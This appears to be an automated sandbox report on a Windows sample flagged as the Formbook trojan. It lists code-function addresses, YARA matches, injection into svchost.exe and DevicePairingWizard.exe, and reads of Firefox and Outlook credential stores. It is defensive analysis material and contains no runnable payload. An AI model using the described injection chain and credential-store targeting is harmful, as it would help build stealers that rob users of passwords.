Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D641A2	4_2_04D641A2
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D701AA	4_2_04D701AA
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D38158	4_2_04D38158
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CA0100	4_2_04CA0100
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D4A118	4_2_04D4A118
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D302C0	4_2_04D302C0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D50274	4_2_04D50274
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D703E6	4_2_04D703E6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6A352	4_2_04D6A352
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CA0CF2	4_2_04CA0CF2
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D50CB5	4_2_04D50CB5
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB0C00	4_2_04CB0C00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CAADE0	4_2_04CAADE0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CC8DBF	4_2_04CC8DBF
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CBAD00	4_2_04CBAD00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D4CD1F	4_2_04D4CD1F
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6EEDB	4_2_04D6EEDB
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6CE93	4_2_04D6CE93
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CC2E90	4_2_04CC2E90
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB0E59	4_2_04CB0E59
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6EE26	4_2_04D6EE26
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CA2FC8	4_2_04CA2FC8
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CBCFE0	4_2_04CBCFE0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D2EFA0	4_2_04D2EFA0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D24F40	4_2_04D24F40
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D52F30	4_2_04D52F30
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CF2F28	4_2_04CF2F28
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CD0F30	4_2_04CD0F30
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CDE8F0	4_2_04CDE8F0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04C968B8	4_2_04C968B8
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CBA840	4_2_04CBA840
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB2840	4_2_04CB2840
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB29A0	4_2_04CB29A0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D7A9A6	4_2_04D7A9A6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CC6962	4_2_04CC6962
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CAEA80	4_2_04CAEA80
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D66BD7	4_2_04D66BD7
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6AB40	4_2_04D6AB40
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CA1460	4_2_04CA1460
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6F43F	4_2_04D6F43F
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D795C3	4_2_04D795C3
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D4D5B0	4_2_04D4D5B0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D67571	4_2_04D67571
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D616CC	4_2_04D616CC
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CF5630	4_2_04CF5630
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6F7B0	4_2_04D6F7B0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB70C0	4_2_04CB70C0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D5F0CC	4_2_04D5F0CC
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6F0E0	4_2_04D6F0E0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D670E9	4_2_04D670E9
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CBB1B0	4_2_04CBB1B0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE516C	4_2_04CE516C
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04C9F172	4_2_04C9F172
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D7B16B	4_2_04D7B16B
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CCB2C0	4_2_04CCB2C0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D512ED	4_2_04D512ED
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB52A0	4_2_04CB52A0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CF739A	4_2_04CF739A
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04C9D34C	4_2_04C9D34C
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6132D	4_2_04D6132D
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6FCF2	4_2_04D6FCF2
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D29C32	4_2_04D29C32
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CCFDC0	4_2_04CCFDC0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB3D40	4_2_04CB3D40
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D61D5A	4_2_04D61D5A
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D67D73	4_2_04D67D73
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB9EB0	4_2_04CB9EB0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04C73FD5	4_2_04C73FD5
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04C73FD2	4_2_04C73FD2
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB1F92	4_2_04CB1F92
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6FFB1	4_2_04D6FFB1
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6FF09	4_2_04D6FF09
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB38E0	4_2_04CB38E0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D1D800	4_2_04D1D800
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB9950	4_2_04CB9950
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CCB950	4_2_04CCB950
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D45910	4_2_04D45910
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D5DAC6	4_2_04D5DAC6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CF5AA0	4_2_04CF5AA0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D51AA3	4_2_04D51AA3
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D4DAAC	4_2_04D4DAAC
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D67A46	4_2_04D67A46
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6FA49	4_2_04D6FA49
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D23A6C	4_2_04D23A6C
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D25BF0	4_2_04D25BF0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CEDBF9	4_2_04CEDBF9
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CCFB80	4_2_04CCFB80
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D6FB76	4_2_04D6FB76
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B132E0	4_2_00B132E0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B0E2B0	4_2_00B0E2B0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B0E2A9	4_2_00B0E2A9
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B0E4D0	4_2_00B0E4D0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B0C550	4_2_00B0C550
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B14A90	4_2_00B14A90
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B2B240	4_2_00B2B240
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04B3ADD8	4_2_04B3ADD8
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04B3BD6C	4_2_04B3BD6C
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04B3BEFD	4_2_04B3BEFD
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04B3B8B8	4_2_04B3B8B8
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04B3B9D3	4_2_04B3B9D3

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: String function: 00E48B40 appears 42 times
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: String function: 00E27F41 appears 35 times
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: String function: 00E40D27 appears 70 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03287E54 appears 102 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0322B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032BF290 appears 105 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 04C9B970 appears 280 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 04CE5130 appears 58 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 04D1EA12 appears 86 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 04CF7E54 appears 111 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 04D2F290 appears 105 times

Source: LisectAVT_2403002B_466.exe, 00000000.00000003.2039765441.0000000003603000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs LisectAVT_2403002B_466.exe
Source: LisectAVT_2403002B_466.exe, 00000000.00000003.2038136685.000000000375D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs LisectAVT_2403002B_466.exe

Source: LisectAVT_2403002B_466.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/10

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E8A2D5 GetLastError,FormatMessageW,

0_2_00E8A2D5

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E78713 AdjustTokenPrivileges,CloseHandle,		0_2_00E78713
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E78CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00E78CC3

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E8B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00E8B59E

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E9F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00E9F121

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E986D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00E986D0

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E24FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00E24FE9

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

File created: C:\Users\user\AppData\Local\Temp\aut139.tmp

Jump to behavior

Source: LisectAVT_2403002B_466.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002EA6000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe"
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	Process created: C:\Windows\SysWOW64\DevicePairingWizard.exe "C:\Windows\SysWOW64\DevicePairingWizard.exe"
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe"	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	Process created: C:\Windows\SysWOW64\DevicePairingWizard.exe "C:\Windows\SysWOW64\DevicePairingWizard.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: LisectAVT_2403002B_466.exe

Static file information: File size 1161737 > 1048576

Source: LisectAVT_2403002B_466.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LisectAVT_2403002B_466.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LisectAVT_2403002B_466.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LisectAVT_2403002B_466.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LisectAVT_2403002B_466.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LisectAVT_2403002B_466.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: LisectAVT_2403002B_466.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ljryBmFNsYlm.exe, 00000003.00000002.4469976906.0000000000A6E000.00000002.00000001.01000000.00000004.sdmp, ljryBmFNsYlm.exe, 00000006.00000000.2279267381.0000000000A6E000.00000002.00000001.01000000.00000004.sdmp
